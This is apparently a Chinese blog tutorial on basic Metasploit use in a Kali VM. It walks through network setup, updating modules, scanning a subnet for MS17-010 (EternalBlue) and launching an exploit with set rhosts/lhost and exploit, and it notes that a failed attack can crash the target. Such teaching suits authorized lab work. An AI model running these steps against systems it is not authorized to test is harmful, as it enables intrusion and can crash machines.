第一章信息收集—漏洞利用框架metasploit基本实用

Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,适合于需要核实漏洞的安全专家,同时也适合于强大进攻能力的渗透测试专家。

VMware里的kali虚拟机

配置IP地址

第一章信息收集—漏洞利用框架metasploit基本实用_第1张图片

 

在里面只需要敲红框里的内容,配置网卡、IP地址、掩码和网关

 

 第一章信息收集—漏洞利用框架metasploit基本实用_第2张图片

 ifup eth0开启网卡

centos用yum安装,kali不一样,是apt-get install 软件名

但在安装前要更新apt的源,vim /etc/apt/sources.list,如下图:(这些在网上找文章更新源,比如阿里云)

第一章信息收集—漏洞利用框架metasploit基本实用_第3张图片

  msfconsole,简称msf是一款常用的渗透测试工具,包含了常见的漏洞利用模块和生成各种木马,是一款非常好的漏洞框架,有些高危漏洞没扫出来,在这个框架里基本能找到

输入msfconsole回车,运行metasploit,如下图:

 这一部分是漏洞库

第一章信息收集—漏洞利用框架metasploit基本实用_第4张图片

 一开始上来可能没有这么多,上边更新源以后,在这下面敲msfupdate,即可对库进行更新

输入以下这个命令,可以查看ms17-010的payload(有效载荷),有辅助的,也有直接利用的,还有一个扫描的

  红框所圈即为扫描的,search用来看ms17-010这个漏洞的模块

第一章信息收集—漏洞利用框架metasploit基本实用_第5张图片

下图0-1为扫描模块,2-5为漏洞模块,0-2模块可以扫描靶机是否可以被漏洞利用,图片来源:https://mp.weixin.qq.com/s?src=11×tamp=1586168774&ver=2262&signature=R-2daqGXDsWc3vxEPpw0132D4vs4IpSoBbAL7-c6TfrDN0e7AGU2nSr5jmZu9pIlmN7pIrZAYGCk-chXENfm32DdWhZ5PXGi43XBDQQgUBPE44X5a*UpF9CK4b5S*UNP&new=1

 第一章信息收集—漏洞利用框架metasploit基本实用_第6张图片

 使用的话输入use auxiliary/scanner/smb/smb_ms17_010,想知道怎么用,show options

 再输入info可以查看说明

第一章信息收集—漏洞利用框架metasploit基本实用_第7张图片

 扫描网段的命令 :set rhosts 网址或网段, exploit用run也可以正常会扫描整个网段,有问题会显示绿颜色

  这就是有漏洞显示绿色

第一章信息收集—漏洞利用框架metasploit基本实用_第8张图片

 现在使用另一个模块

设置靶机ip

set rhosts 192.168.0.101 

设置攻击ip

set lhost 192.168.0.110

 开启漏洞攻击

exploit

第一章信息收集—漏洞利用框架metasploit基本实用_第9张图片

 攻击成功则会向下图这样显示,要是中间断开没有攻击成功的话,被攻击的电脑主机可能会蓝屏

第一章信息收集—漏洞利用框架metasploit基本实用_第10张图片

 下图是一个集中的漏洞库,更新得很快,如果有更新可以加载到kali里(我并没有找到操作的博客。。。)

 

你可能感兴趣的:(第一章信息收集—漏洞利用框架metasploit基本实用)